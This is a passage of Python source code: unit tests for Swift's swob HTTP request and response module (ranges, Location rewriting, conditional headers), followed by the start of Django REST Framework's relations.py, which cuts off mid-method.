        status, headers, app_iter = req.call_application(test_app)
        resp = swift.common.swob.Response(status=status, headers=dict(headers),
                                          app_iter=app_iter)
        output_iter = resp(req.environ, lambda *_: None)
        self.assertEquals(list(output_iter), [''])

    def test_call_preserves_closeability(self):
        """Closing the app_iter mid-stream stops the underlying generator."""
        def test_app(environ, start_response):
            start_response('200 OK', [])
            yield "igloo"
            yield "shindig"
            yield "macadamia"
            yield "hullabaloo"
        req = swift.common.swob.Request.blank('/')
        req.method = 'GET'
        status, headers, app_iter = req.call_application(test_app)
        iterator = iter(app_iter)
        self.assertEqual('igloo', next(iterator))
        self.assertEqual('shindig', next(iterator))
        app_iter.close()
        # use the builtin next() (as above) rather than the Py2-only
        # iterator.next bound method
        self.assertRaises(StopIteration, next, iterator)

    def test_location_rewrite(self):
        """Relative Location headers are made absolute using the request
        host; default ports are dropped only for the matching scheme."""
        def start_response(env, headers):
            pass
        req = swift.common.swob.Request.blank(
            '/', environ={'HTTP_HOST': 'somehost'})
        resp = self._get_response()
        resp.location = '/something'
        # read response
        ''.join(resp(req.environ, start_response))
        self.assertEquals(resp.location, 'http://somehost/something')
        req = swift.common.swob.Request.blank(
            '/', environ={'HTTP_HOST': 'somehost:80'})
        resp = self._get_response()
        resp.location = '/something'
        # read response
        ''.join(resp(req.environ, start_response))
        self.assertEquals(resp.location, 'http://somehost/something')
        req = swift.common.swob.Request.blank(
            '/', environ={'HTTP_HOST': 'somehost:443',
                          'wsgi.url_scheme': 'http'})
        resp = self._get_response()
        resp.location = '/something'
        # read response: 443 is not the default port for http, so it stays
        ''.join(resp(req.environ, start_response))
        self.assertEquals(resp.location, 'http://somehost:443/something')
        req = swift.common.swob.Request.blank(
            '/', environ={'HTTP_HOST': 'somehost:443',
                          'wsgi.url_scheme': 'https'})
        resp = self._get_response()
        resp.location = '/something'
        # read response
        ''.join(resp(req.environ, start_response))
        self.assertEquals(resp.location, 'https://somehost/something')

    def test_location_rewrite_no_host(self):
        """Without HTTP_HOST, SERVER_NAME/SERVER_PORT are used instead."""
        def start_response(env, headers):
            pass
        req = swift.common.swob.Request.blank(
            '/', environ={'SERVER_NAME': 'local', 'SERVER_PORT': 80})
        del req.environ['HTTP_HOST']
        resp = self._get_response()
        resp.location = '/something'
        # read response
        ''.join(resp(req.environ, start_response))
        self.assertEquals(resp.location, 'http://local/something')
        req = swift.common.swob.Request.blank(
            '/', environ={'SERVER_NAME': 'local', 'SERVER_PORT': 81})
        del req.environ['HTTP_HOST']
        resp = self._get_response()
        resp.location = '/something'
        # read response
        ''.join(resp(req.environ, start_response))
        self.assertEquals(resp.location, 'http://local:81/something')

    def test_location_no_rewrite(self):
        """Absolute Location headers are left untouched."""
        def start_response(env, headers):
            pass
        req = swift.common.swob.Request.blank(
            '/', environ={'HTTP_HOST': 'somehost'})
        resp = self._get_response()
        resp.location = 'http://www.google.com/'
        # read response
        ''.join(resp(req.environ, start_response))
        self.assertEquals(resp.location, 'http://www.google.com/')

    def test_location_no_rewrite_when_told_not_to(self):
        """swift.leave_relative_location in the environ suppresses the
        Location rewrite."""
        def start_response(env, headers):
            pass
        req = swift.common.swob.Request.blank(
            '/', environ={'SERVER_NAME': 'local', 'SERVER_PORT': 81,
                          'swift.leave_relative_location': True})
        del req.environ['HTTP_HOST']
        resp = self._get_response()
        resp.location = '/something'
        # read response
        ''.join(resp(req.environ, start_response))
        self.assertEquals(resp.location, '/something')

    def test_app_iter(self):
        """Setting app_iter replaces the response body content."""
        def start_response(env, headers):
            pass
        resp = self._get_response()
        resp.app_iter = ['a', 'b', 'c']
        body = ''.join(resp({}, start_response))
        self.assertEquals(body, 'abc')

    def test_multi_ranges_wo_iter_ranges(self):
        """A multi-range request against an app_iter that lacks
        app_iter_ranges falls back to a plain 200."""
        def test_app(environ, start_response):
            start_response('200 OK', [('Content-Length', '10')])
            return ['1234567890']
        req = swift.common.swob.Request.blank(
            '/', headers={'Range': 'bytes=0-9,10-19,20-29'})
        resp = req.get_response(test_app)
        resp.conditional_response = True
        resp.content_length = 10
        # read response
        ''.join(resp._response_iter(resp.app_iter, ''))
        self.assertEquals(resp.status, '200 OK')
        self.assertEqual(10, resp.content_length)

    def test_single_range_wo_iter_range(self):
        """A single-range request without app_iter_ranges support also
        stays a plain 200."""
        def test_app(environ, start_response):
            start_response('200 OK', [('Content-Length', '10')])
            return ['1234567890']
        req = swift.common.swob.Request.blank(
            '/', headers={'Range': 'bytes=0-9'})
        resp = req.get_response(test_app)
        resp.conditional_response = True
        resp.content_length = 10
        # read response
        ''.join(resp._response_iter(resp.app_iter, ''))
        self.assertEquals(resp.status, '200 OK')
        self.assertEqual(10, resp.content_length)

    def test_multi_range_body(self):
        """A multi-range request over a plain body yields a MIME multipart
        body with per-part Content-Type and Content-Range headers."""
        def test_app(environ, start_response):
            start_response('200 OK', [('Content-Length', '4')])
            return ['abcd']
        req = swift.common.swob.Request.blank(
            '/', headers={'Range': 'bytes=0-9,10-19,20-29'})
        resp = req.get_response(test_app)
        resp.conditional_response = True
        resp.content_length = 100
        resp.content_type = 'text/plain'
        content = ''.join(resp._response_iter(None,
                                              ('0123456789112345678'
                                               '92123456789')))
        self.assert_(re.match(('--[a-f0-9]{32}\r\n'
                               'Content-Type: text/plain\r\n'
                               'Content-Range: bytes '
                               '0-9/100\r\n\r\n0123456789\r\n'
                               '--[a-f0-9]{32}\r\n'
                               'Content-Type: text/plain\r\n'
                               'Content-Range: bytes '
                               '10-19/100\r\n\r\n1123456789\r\n'
                               '--[a-f0-9]{32}\r\n'
                               'Content-Type: text/plain\r\n'
                               'Content-Range: bytes '
                               '20-29/100\r\n\r\n2123456789\r\n'
                               '--[a-f0-9]{32}--'), content))

    def test_multi_response_iter(self):
        """When the app_iter provides app_iter_ranges, the conditional
        response delegates to it with the parsed ranges, content type,
        boundary, and size."""
        def test_app(environ, start_response):
            start_response('200 OK', [('Content-Length', '10'),
                                      ('Content-Type', 'application/xml')])
            return ['0123456789']
        app_iter_ranges_args = []

        class App_iter(object):
            def app_iter_ranges(self, ranges, content_type, boundary, size):
                app_iter_ranges_args.append((ranges, content_type, boundary,
                                             size))
                for i in range(3):
                    yield str(i) + 'fun'
                yield boundary

            def __iter__(self):
                for i in range(3):
                    yield str(i) + 'fun'
        req = swift.common.swob.Request.blank(
            '/', headers={'Range': 'bytes=1-5,8-11'})
        resp = req.get_response(test_app)
        resp.conditional_response = True
        resp.content_length = 12
        content = ''.join(resp._response_iter(App_iter(), ''))
        boundary = content[-32:]
        self.assertEqual(content[:-32], '0fun1fun2fun')
        self.assertEqual(app_iter_ranges_args,
                         [([(1, 6), (8, 12)], 'application/xml',
                           boundary, 12)])

    def test_range_body(self):
        """Satisfiable ranges give 206 with Content-Range; syntactically
        valid but unsatisfiable ranges give 416; invalid ones are ignored
        (200)."""
        def test_app(environ, start_response):
            start_response('200 OK', [('Content-Length', '10')])
            return ['1234567890']

        def start_response(env, headers):
            pass
        req = swift.common.swob.Request.blank(
            '/', headers={'Range': 'bytes=1-3'})
        resp = swift.common.swob.Response(
            body='1234567890', request=req,
            conditional_response=True)
        body = ''.join(resp([], start_response))
        self.assertEquals(body, '234')
        self.assertEquals(resp.content_range, 'bytes 1-3/10')
        self.assertEquals(resp.status, '206 Partial Content')
        # syntactically valid, but does not make sense, so returning 416
        # in next couple of cases.
        req = swift.common.swob.Request.blank(
            '/', headers={'Range': 'bytes=-0'})
        resp = req.get_response(test_app)
        resp.conditional_response = True
        body = ''.join(resp([], start_response))
        self.assertEquals(body, '')
        self.assertEquals(resp.content_length, 0)
        self.assertEquals(resp.status, '416 Requested Range Not Satisfiable')
        resp = swift.common.swob.Response(
            body='1234567890', request=req,
            conditional_response=True)
        body = ''.join(resp([], start_response))
        self.assertEquals(body, '')
        self.assertEquals(resp.content_length, 0)
        self.assertEquals(resp.status, '416 Requested Range Not Satisfiable')
        # Syntactically-invalid Range headers "MUST" be ignored
        req = swift.common.swob.Request.blank(
            '/', headers={'Range': 'bytes=3-2'})
        resp = req.get_response(test_app)
        resp.conditional_response = True
        body = ''.join(resp([], start_response))
        self.assertEquals(body, '1234567890')
        self.assertEquals(resp.status, '200 OK')
        resp = swift.common.swob.Response(
            body='1234567890', request=req,
            conditional_response=True)
        body = ''.join(resp([], start_response))
        self.assertEquals(body, '1234567890')
        self.assertEquals(resp.status, '200 OK')

    def test_content_type(self):
        """content_type reads back without charset parameters."""
        resp = self._get_response()
        resp.content_type = 'text/plain; charset=utf8'
        self.assertEquals(resp.content_type, 'text/plain')

    def test_charset(self):
        """charset is parsed from Content-Type and is settable."""
        resp = self._get_response()
        resp.content_type = 'text/plain; charset=utf8'
        self.assertEquals(resp.charset, 'utf8')
        resp.charset = 'utf16'
        self.assertEquals(resp.charset, 'utf16')

    def test_charset_content_type(self):
        """charset and content_type kwargs compose in either order."""
        resp = swift.common.swob.Response(
            content_type='text/plain', charset='utf-8')
        self.assertEquals(resp.charset, 'utf-8')
        resp = swift.common.swob.Response(
            charset='utf-8', content_type='text/plain')
        self.assertEquals(resp.charset, 'utf-8')

    def test_etag(self):
        """etag is stored quoted in the header, read back unquoted, and
        removed when set to None."""
        resp = self._get_response()
        resp.etag = 'hi'
        self.assertEquals(resp.headers['Etag'], '"hi"')
        self.assertEquals(resp.etag, 'hi')
        self.assert_('etag' in resp.headers)
        resp.etag = None
        self.assert_('etag' not in resp.headers)

    def test_host_url_default(self):
        """host_url from SERVER_NAME/PORT with a non-default port."""
        resp = self._get_response()
        env = resp.environ
        env['wsgi.url_scheme'] = 'http'
        env['SERVER_NAME'] = 'bob'
        env['SERVER_PORT'] = '1234'
        del env['HTTP_HOST']
        self.assertEquals(resp.host_url, 'http://bob:1234')

    def test_host_url_default_port_squelched(self):
        """host_url drops the default http port 80."""
        resp = self._get_response()
        env = resp.environ
        env['wsgi.url_scheme'] = 'http'
        env['SERVER_NAME'] = 'bob'
        env['SERVER_PORT'] = '80'
        del env['HTTP_HOST']
        self.assertEquals(resp.host_url, 'http://bob')

    def test_host_url_https(self):
        """host_url keeps a non-default port under https."""
        resp = self._get_response()
        env = resp.environ
        env['wsgi.url_scheme'] = 'https'
        env['SERVER_NAME'] = 'bob'
        env['SERVER_PORT'] = '1234'
        del env['HTTP_HOST']
        self.assertEquals(resp.host_url, 'https://bob:1234')

    def test_host_url_https_port_squelched(self):
        """host_url drops the default https port 443."""
        resp = self._get_response()
        env = resp.environ
        env['wsgi.url_scheme'] = 'https'
        env['SERVER_NAME'] = 'bob'
        env['SERVER_PORT'] = '443'
        del env['HTTP_HOST']
        self.assertEquals(resp.host_url, 'https://bob')

    def test_host_url_host_override(self):
        """HTTP_HOST takes precedence over SERVER_NAME/PORT."""
        resp = self._get_response()
        env = resp.environ
        env['wsgi.url_scheme'] = 'http'
        env['SERVER_NAME'] = 'bob'
        env['SERVER_PORT'] = '1234'
        env['HTTP_HOST'] = 'someother'
        self.assertEquals(resp.host_url, 'http://someother')

    def test_host_url_host_port_override(self):
        """An HTTP_HOST with an explicit port is used verbatim."""
        resp = self._get_response()
        env = resp.environ
        env['wsgi.url_scheme'] = 'http'
        env['SERVER_NAME'] = 'bob'
        env['SERVER_PORT'] = '1234'
        env['HTTP_HOST'] = 'someother:5678'
        self.assertEquals(resp.host_url, 'http://someother:5678')

    def test_host_url_host_https(self):
        """HTTP_HOST with port is used verbatim under https too."""
        resp = self._get_response()
        env = resp.environ
        env['wsgi.url_scheme'] = 'https'
        env['SERVER_NAME'] = 'bob'
        env['SERVER_PORT'] = '1234'
        env['HTTP_HOST'] = 'someother:5678'
        self.assertEquals(resp.host_url, 'https://someother:5678')

    def test_507(self):
        """HTTPInsufficientStorage body mentions the drive (or 'unknown')."""
        resp = swift.common.swob.HTTPInsufficientStorage()
        content = ''.join(resp._response_iter(resp.app_iter, resp._body))
        self.assertEquals(
            content,
            '<html><h1>Insufficient Storage</h1><p>There was not enough space '
            'to save the resource. Drive: unknown</p></html>')
        resp = swift.common.swob.HTTPInsufficientStorage(drive='sda1')
        content = ''.join(resp._response_iter(resp.app_iter, resp._body))
        self.assertEquals(
            content,
            '<html><h1>Insufficient Storage</h1><p>There was not enough space '
            'to save the resource. Drive: sda1</p></html>')

    def test_200_with_body_and_headers(self):
        """An explicit body wins over a stale Content-Length header."""
        headers = {'Content-Length': '0'}
        content = 'foo'
        resp = swift.common.swob.HTTPOk(body=content, headers=headers)
        self.assertEquals(resp.body, content)
        self.assertEquals(resp.content_length, len(content))

    def test_init_with_body_headers_app_iter(self):
        """Precedence among body, Content-Length header, and app_iter:
        body wins over headers; app_iter wins over body."""
        # body exists but no headers and no app_iter
        body = 'ok'
        resp = swift.common.swob.Response(body=body)
        self.assertEquals(resp.body, body)
        self.assertEquals(resp.content_length, len(body))
        # body and headers with 0 content_length exist but no app_iter
        body = 'ok'
        resp = swift.common.swob.Response(
            body=body, headers={'Content-Length': '0'})
        self.assertEquals(resp.body, body)
        self.assertEquals(resp.content_length, len(body))
        # body and headers with content_length exist but no app_iter
        body = 'ok'
        resp = swift.common.swob.Response(
            body=body, headers={'Content-Length': '5'})
        self.assertEquals(resp.body, body)
        self.assertEquals(resp.content_length, len(body))
        # body and headers with no content_length exist but no app_iter
        body = 'ok'
        resp = swift.common.swob.Response(body=body, headers={})
        self.assertEquals(resp.body, body)
        self.assertEquals(resp.content_length, len(body))
        # body, headers with content_length and app_iter exist
        resp = swift.common.swob.Response(
            body='ok', headers={'Content-Length': '5'}, app_iter=iter([]))
        self.assertEquals(resp.content_length, 5)
        self.assertEquals(resp.body, '')
        # headers with content_length and app_iter exist but no body
        resp = swift.common.swob.Response(
            headers={'Content-Length': '5'}, app_iter=iter([]))
        self.assertEquals(resp.content_length, 5)
        self.assertEquals(resp.body, '')
        # app_iter exists but no body and headers
        resp = swift.common.swob.Response(app_iter=iter([]))
        self.assertEquals(resp.content_length, None)
        self.assertEquals(resp.body, '')
class TestUTC(unittest.TestCase):
    """Tests for the swob UTC tzinfo singleton."""

    def test_tzname(self):
        """The UTC tzinfo reports 'UTC' as its zone name."""
        self.assertEqual('UTC', swift.common.swob.UTC.tzname(None))
class TestConditionalIfNoneMatch(unittest.TestCase):
    """Conditional-response handling of the If-None-Match header."""

    def fake_app(self, environ, start_response):
        start_response('200 OK', [('Etag', 'the-etag')])
        return ['hi']

    def fake_start_response(*a, **kw):
        pass

    def _conditional_get(self, if_none_match):
        # Issue a GET with the given If-None-Match value through fake_app
        # and return (status_int, body) of the conditional response.
        req = swift.common.swob.Request.blank(
            '/', headers={'If-None-Match': if_none_match})
        resp = req.get_response(self.fake_app)
        resp.conditional_response = True
        body = ''.join(resp(req.environ, self.fake_start_response))
        return resp.status_int, body

    def test_simple_match(self):
        # etag matches --> 304
        self.assertEqual((304, ''), self._conditional_get('the-etag'))

    def test_quoted_simple_match(self):
        # double quotes don't matter
        self.assertEqual((304, ''), self._conditional_get('"the-etag"'))

    def test_list_match(self):
        # it works with lists of etags to match
        self.assertEqual(
            (304, ''), self._conditional_get('"bert", "the-etag", "ernie"'))

    def test_list_no_match(self):
        # no matches --> whatever the original status was
        self.assertEqual(
            (200, 'hi'), self._conditional_get('"bert", "ernie"'))

    def test_match_star(self):
        # "*" means match anything; see RFC 2616 section 14.24
        self.assertEqual((304, ''), self._conditional_get('*'))
class TestConditionalIfMatch(unittest.TestCase):
    """Conditional request handling for the If-Match header (RFC 2616 14.24).

    Fix: use assertEqual; assertEquals is a deprecated alias.
    """

    def fake_app(self, environ, start_response):
        # Minimal WSGI app that always serves the same etag and body.
        start_response('200 OK', [('Etag', 'the-etag')])
        return ['hi']

    def fake_start_response(*a, **kw):
        # Deliberately swallows all arguments (including the implicit `self`)
        # so it can be passed straight to the response callable.
        pass

    def test_simple_match(self):
        # if etag matches, proceed as normal
        req = swift.common.swob.Request.blank(
            '/', headers={'If-Match': 'the-etag'})
        resp = req.get_response(self.fake_app)
        resp.conditional_response = True
        body = ''.join(resp(req.environ, self.fake_start_response))
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(body, 'hi')

    def test_simple_conditional_etag_match(self):
        # if the overriding _conditional_etag matches, proceed as normal
        req = swift.common.swob.Request.blank(
            '/', headers={'If-Match': 'not-the-etag'})
        resp = req.get_response(self.fake_app)
        resp.conditional_response = True
        resp._conditional_etag = 'not-the-etag'
        body = ''.join(resp(req.environ, self.fake_start_response))
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(body, 'hi')

    def test_quoted_simple_match(self):
        # double quotes or not, doesn't matter
        req = swift.common.swob.Request.blank(
            '/', headers={'If-Match': '"the-etag"'})
        resp = req.get_response(self.fake_app)
        resp.conditional_response = True
        body = ''.join(resp(req.environ, self.fake_start_response))
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(body, 'hi')

    def test_no_match(self):
        # no match --> 412
        req = swift.common.swob.Request.blank(
            '/', headers={'If-Match': 'not-the-etag'})
        resp = req.get_response(self.fake_app)
        resp.conditional_response = True
        body = ''.join(resp(req.environ, self.fake_start_response))
        self.assertEqual(resp.status_int, 412)
        self.assertEqual(body, '')

    def test_simple_conditional_etag_no_match(self):
        # the overriding _conditional_etag does not match --> 412
        req = swift.common.swob.Request.blank(
            '/', headers={'If-Match': 'the-etag'})
        resp = req.get_response(self.fake_app)
        resp.conditional_response = True
        resp._conditional_etag = 'not-the-etag'
        body = ''.join(resp(req.environ, self.fake_start_response))
        self.assertEqual(resp.status_int, 412)
        self.assertEqual(body, '')

    def test_match_star(self):
        # "*" means match anything; see RFC 2616 section 14.24
        req = swift.common.swob.Request.blank(
            '/', headers={'If-Match': '*'})
        resp = req.get_response(self.fake_app)
        resp.conditional_response = True
        body = ''.join(resp(req.environ, self.fake_start_response))
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(body, 'hi')

    def test_match_star_on_404(self):
        # "*" only matches an existing entity, so a 404 becomes 412
        def fake_app_404(environ, start_response):
            start_response('404 Not Found', [])
            return ['hi']
        req = swift.common.swob.Request.blank(
            '/', headers={'If-Match': '*'})
        resp = req.get_response(fake_app_404)
        resp.conditional_response = True
        body = ''.join(resp(req.environ, self.fake_start_response))
        self.assertEqual(resp.status_int, 412)
        self.assertEqual(body, '')
class TestConditionalIfModifiedSince(unittest.TestCase):
    """Conditional request handling for the If-Modified-Since header.

    Fix: use assertEqual; assertEquals is a deprecated alias.
    """

    def fake_app(self, environ, start_response):
        # Minimal WSGI app with a fixed Last-Modified timestamp.
        start_response(
            '200 OK', [('Last-Modified', 'Thu, 27 Feb 2014 03:29:37 GMT')])
        return ['hi']

    def fake_start_response(*a, **kw):
        # Deliberately swallows all arguments (including the implicit `self`)
        # so it can be passed straight to the response callable.
        pass

    def test_absent(self):
        # no header --> unconditional response
        req = swift.common.swob.Request.blank('/')
        resp = req.get_response(self.fake_app)
        resp.conditional_response = True
        body = ''.join(resp(req.environ, self.fake_start_response))
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(body, 'hi')

    def test_before(self):
        # modified after the given date --> serve normally
        req = swift.common.swob.Request.blank(
            '/',
            headers={'If-Modified-Since': 'Thu, 27 Feb 2014 03:29:36 GMT'})
        resp = req.get_response(self.fake_app)
        resp.conditional_response = True
        body = ''.join(resp(req.environ, self.fake_start_response))
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(body, 'hi')

    def test_same(self):
        # not modified since the exact timestamp --> 304
        req = swift.common.swob.Request.blank(
            '/',
            headers={'If-Modified-Since': 'Thu, 27 Feb 2014 03:29:37 GMT'})
        resp = req.get_response(self.fake_app)
        resp.conditional_response = True
        body = ''.join(resp(req.environ, self.fake_start_response))
        self.assertEqual(resp.status_int, 304)
        self.assertEqual(body, '')

    def test_greater(self):
        # not modified since a later date --> 304
        req = swift.common.swob.Request.blank(
            '/',
            headers={'If-Modified-Since': 'Thu, 27 Feb 2014 03:29:38 GMT'})
        resp = req.get_response(self.fake_app)
        resp.conditional_response = True
        body = ''.join(resp(req.environ, self.fake_start_response))
        self.assertEqual(resp.status_int, 304)
        self.assertEqual(body, '')

    def test_out_of_range_is_ignored(self):
        # All that datetime gives us is a ValueError or OverflowError when
        # something is out of range (i.e. less than datetime.datetime.min or
        # greater than datetime.datetime.max). Unfortunately, we can't
        # distinguish between a date being too old and a date being too new,
        # so the best we can do is ignore such headers.
        max_date_list = list(datetime.datetime.max.timetuple())
        max_date_list[0] += 1  # bump up the year
        too_big_date_header = time.strftime(
            "%a, %d %b %Y %H:%M:%S GMT", time.struct_time(max_date_list))
        req = swift.common.swob.Request.blank(
            '/',
            headers={'If-Modified-Since': too_big_date_header})
        resp = req.get_response(self.fake_app)
        resp.conditional_response = True
        body = ''.join(resp(req.environ, self.fake_start_response))
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(body, 'hi')
class TestConditionalIfUnmodifiedSince(unittest.TestCase):
    """Conditional request handling for the If-Unmodified-Since header.

    Fix: use assertEqual; assertEquals is a deprecated alias.
    """

    def fake_app(self, environ, start_response):
        # Minimal WSGI app with a fixed Last-Modified timestamp.
        start_response(
            '200 OK', [('Last-Modified', 'Thu, 20 Feb 2014 03:29:37 GMT')])
        return ['hi']

    def fake_start_response(*a, **kw):
        # Deliberately swallows all arguments (including the implicit `self`)
        # so it can be passed straight to the response callable.
        pass

    def test_absent(self):
        # no header --> unconditional response
        req = swift.common.swob.Request.blank('/')
        resp = req.get_response(self.fake_app)
        resp.conditional_response = True
        body = ''.join(resp(req.environ, self.fake_start_response))
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(body, 'hi')

    def test_before(self):
        # modified after the given date --> 412
        req = swift.common.swob.Request.blank(
            '/',
            headers={'If-Unmodified-Since': 'Thu, 20 Feb 2014 03:29:36 GMT'})
        resp = req.get_response(self.fake_app)
        resp.conditional_response = True
        body = ''.join(resp(req.environ, self.fake_start_response))
        self.assertEqual(resp.status_int, 412)
        self.assertEqual(body, '')

    def test_same(self):
        # unmodified since the exact timestamp --> serve normally
        req = swift.common.swob.Request.blank(
            '/',
            headers={'If-Unmodified-Since': 'Thu, 20 Feb 2014 03:29:37 GMT'})
        resp = req.get_response(self.fake_app)
        resp.conditional_response = True
        body = ''.join(resp(req.environ, self.fake_start_response))
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(body, 'hi')

    def test_greater(self):
        # unmodified since a later date --> serve normally
        req = swift.common.swob.Request.blank(
            '/',
            headers={'If-Unmodified-Since': 'Thu, 20 Feb 2014 03:29:38 GMT'})
        resp = req.get_response(self.fake_app)
        resp.conditional_response = True
        body = ''.join(resp(req.environ, self.fake_start_response))
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(body, 'hi')

    def test_out_of_range_is_ignored(self):
        # All that datetime gives us is a ValueError or OverflowError when
        # something is out of range (i.e. less than datetime.datetime.min or
        # greater than datetime.datetime.max). Unfortunately, we can't
        # distinguish between a date being too old and a date being too new,
        # so the best we can do is ignore such headers.
        max_date_list = list(datetime.datetime.max.timetuple())
        max_date_list[0] += 1  # bump up the year
        too_big_date_header = time.strftime(
            "%a, %d %b %Y %H:%M:%S GMT", time.struct_time(max_date_list))
        req = swift.common.swob.Request.blank(
            '/',
            headers={'If-Unmodified-Since': too_big_date_header})
        resp = req.get_response(self.fake_app)
        resp.conditional_response = True
        body = ''.join(resp(req.environ, self.fake_start_response))
        self.assertEqual(resp.status_int, 200)
        self.assertEqual(body, 'hi')
# Allow running this test module directly, outside of a test runner.
if __name__ == '__main__':
    unittest.main()
| apache-2.0 |
polojacky/ehfpi | ehf/rest_framework/relations.py | 7 | 24789 | """
Serializer fields that deal with relationships.
These fields allow you to specify the style that should be used to represent
model relationships, including hyperlinks, primary keys, or slugs.
"""
from __future__ import unicode_literals
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.core.urlresolvers import resolve, get_script_prefix, NoReverseMatch
from django import forms
from django.db.models.fields import BLANK_CHOICE_DASH
from django.forms import widgets
from django.forms.models import ModelChoiceIterator
from django.utils.translation import ugettext_lazy as _
from rest_framework.fields import Field, WritableField, get_component, is_simple_callable
from rest_framework.reverse import reverse
from rest_framework.compat import urlparse
from rest_framework.compat import smart_text
import warnings
##### Relational fields #####
# Not actually Writable, but subclasses may need to be.
# Not actually Writable, but subclasses may need to be.
class RelatedField(WritableField):
    """
    Base class for related model fields.
    This represents a relationship using the unicode representation of the target.
    """
    # Form-rendering hooks; the `many_*` variants replace them when many=True.
    widget = widgets.Select
    many_widget = widgets.SelectMultiple
    form_field_class = forms.ChoiceField
    many_form_field_class = forms.MultipleChoiceField
    # Incoming values treated as "no relation" by field_from_native().
    null_values = (None, '', 'None')
    cache_choices = False
    empty_label = None
    # Subclasses flip this to False to become writable.
    read_only = True
    many = False
    def __init__(self, *args, **kwargs):
        # 'null' is to be deprecated in favor of 'required'
        if 'null' in kwargs:
            warnings.warn('The `null` keyword argument is deprecated. '
                          'Use the `required` keyword argument instead.',
                          DeprecationWarning, stacklevel=2)
            kwargs['required'] = not kwargs.pop('null')
        queryset = kwargs.pop('queryset', None)
        self.many = kwargs.pop('many', self.many)
        if self.many:
            # Switch to the multi-select form machinery for to-many relations.
            self.widget = self.many_widget
            self.form_field_class = self.many_form_field_class
        kwargs['read_only'] = kwargs.pop('read_only', self.read_only)
        super(RelatedField, self).__init__(*args, **kwargs)
        if not self.required:
            self.empty_label = BLANK_CHOICE_DASH[0][1]
        self.queryset = queryset
    def initialize(self, parent, field_name):
        # Auto-detect the queryset from the parent serializer's model when a
        # writable field was constructed without an explicit `queryset`.
        super(RelatedField, self).initialize(parent, field_name)
        if self.queryset is None and not self.read_only:
            manager = getattr(self.parent.opts.model, self.source or field_name)
            if hasattr(manager, 'related'):  # Forward
                self.queryset = manager.related.model._default_manager.all()
            else:  # Reverse
                self.queryset = manager.field.rel.to._default_manager.all()
    ### We need this stuff to make form choices work...
    def prepare_value(self, obj):
        # Value shown for a form widget: the serialized representation.
        return self.to_native(obj)
    def label_from_instance(self, obj):
        """
        Return a readable representation for use with eg. select widgets.
        """
        desc = smart_text(obj)
        ident = smart_text(self.to_native(obj))
        if desc == ident:
            return desc
        return "%s - %s" % (desc, ident)
    def _get_queryset(self):
        return self._queryset
    def _set_queryset(self, queryset):
        # Assigning a queryset also refreshes the widget's choices.
        self._queryset = queryset
        self.widget.choices = self.choices
    queryset = property(_get_queryset, _set_queryset)
    def _get_choices(self):
        # If self._choices is set, then somebody must have manually set
        # the property self.choices. In this case, just return self._choices.
        if hasattr(self, '_choices'):
            return self._choices
        # Otherwise, execute the QuerySet in self.queryset to determine the
        # choices dynamically. Return a fresh ModelChoiceIterator that has not been
        # consumed. Note that we're instantiating a new ModelChoiceIterator *each*
        # time _get_choices() is called (and, thus, each time self.choices is
        # accessed) so that we can ensure the QuerySet has not been consumed. This
        # construct might look complicated but it allows for lazy evaluation of
        # the queryset.
        return ModelChoiceIterator(self)
    def _set_choices(self, value):
        # Setting choices also sets the choices on the widget.
        # choices can be any iterable, but we call list() on it because
        # it will be consumed more than once.
        self._choices = self.widget.choices = list(value)
    choices = property(_get_choices, _set_choices)
    ### Default value handling
    def get_default_value(self):
        # A missing to-many relation defaults to an empty list, not None.
        default = super(RelatedField, self).get_default_value()
        if self.many and default is None:
            return []
        return default
    ### Regular serializer stuff...
    def field_to_native(self, obj, field_name):
        # Serialize the relation found on `obj`, following dotted `source`
        # paths; returns None if any step of the path is missing.
        try:
            if self.source == '*':
                return self.to_native(obj)
            source = self.source or field_name
            value = obj
            for component in source.split('.'):
                if value is None:
                    break
                value = get_component(value, component)
        except ObjectDoesNotExist:
            return None
        if value is None:
            return None
        if self.many:
            if is_simple_callable(getattr(value, 'all', None)):
                return [self.to_native(item) for item in value.all()]
            else:
                # Also support non-queryset iterables.
                # This allows us to also support plain lists of related items.
                return [self.to_native(item) for item in value]
        return self.to_native(value)
    def field_from_native(self, data, files, field_name, into):
        # Deserialize the incoming value into `into[source]`, handling both
        # form-encoded (getlist) and plain-dict payloads.
        if self.read_only:
            return
        try:
            if self.many:
                try:
                    # Form data
                    value = data.getlist(field_name)
                    if value == [''] or value == []:
                        raise KeyError
                except AttributeError:
                    # Non-form data
                    value = data[field_name]
            else:
                value = data[field_name]
        except KeyError:
            if self.partial:
                return
            value = self.get_default_value()
        if value in self.null_values:
            if self.required:
                raise ValidationError(self.error_messages['required'])
            into[(self.source or field_name)] = None
        elif self.many:
            into[(self.source or field_name)] = [self.from_native(item) for item in value]
        else:
            into[(self.source or field_name)] = self.from_native(value)
### PrimaryKey relationships
class PrimaryKeyRelatedField(RelatedField):
    """
    Represents a relationship as a pk value.
    """
    read_only = False
    default_error_messages = {
        'does_not_exist': _("Invalid pk '%s' - object does not exist."),
        'incorrect_type': _('Incorrect type. Expected pk value, received %s.'),
    }
    # TODO: Remove these field hacks...
    def prepare_value(self, obj):
        return self.to_native(obj.pk)
    def label_from_instance(self, obj):
        """
        Return a readable representation for use with eg. select widgets.
        """
        desc = smart_text(obj)
        ident = smart_text(self.to_native(obj.pk))
        if desc == ident:
            return desc
        return "%s - %s" % (desc, ident)
    # TODO: Possibly change this to just take `obj`, through prob less performant
    def to_native(self, pk):
        # The pk itself is the serialized representation.
        return pk
    def from_native(self, data):
        # Look the pk up in the configured queryset; translate lookup failures
        # into user-facing validation errors.
        if self.queryset is None:
            raise Exception('Writable related fields must include a `queryset` argument')
        try:
            return self.queryset.get(pk=data)
        except ObjectDoesNotExist:
            msg = self.error_messages['does_not_exist'] % smart_text(data)
            raise ValidationError(msg)
        except (TypeError, ValueError):
            received = type(data).__name__
            msg = self.error_messages['incorrect_type'] % received
            raise ValidationError(msg)
    def field_to_native(self, obj, field_name):
        # Overridden to serialize pks directly, avoiding a full object fetch
        # wherever `serializable_value` can short-circuit it.
        if self.many:
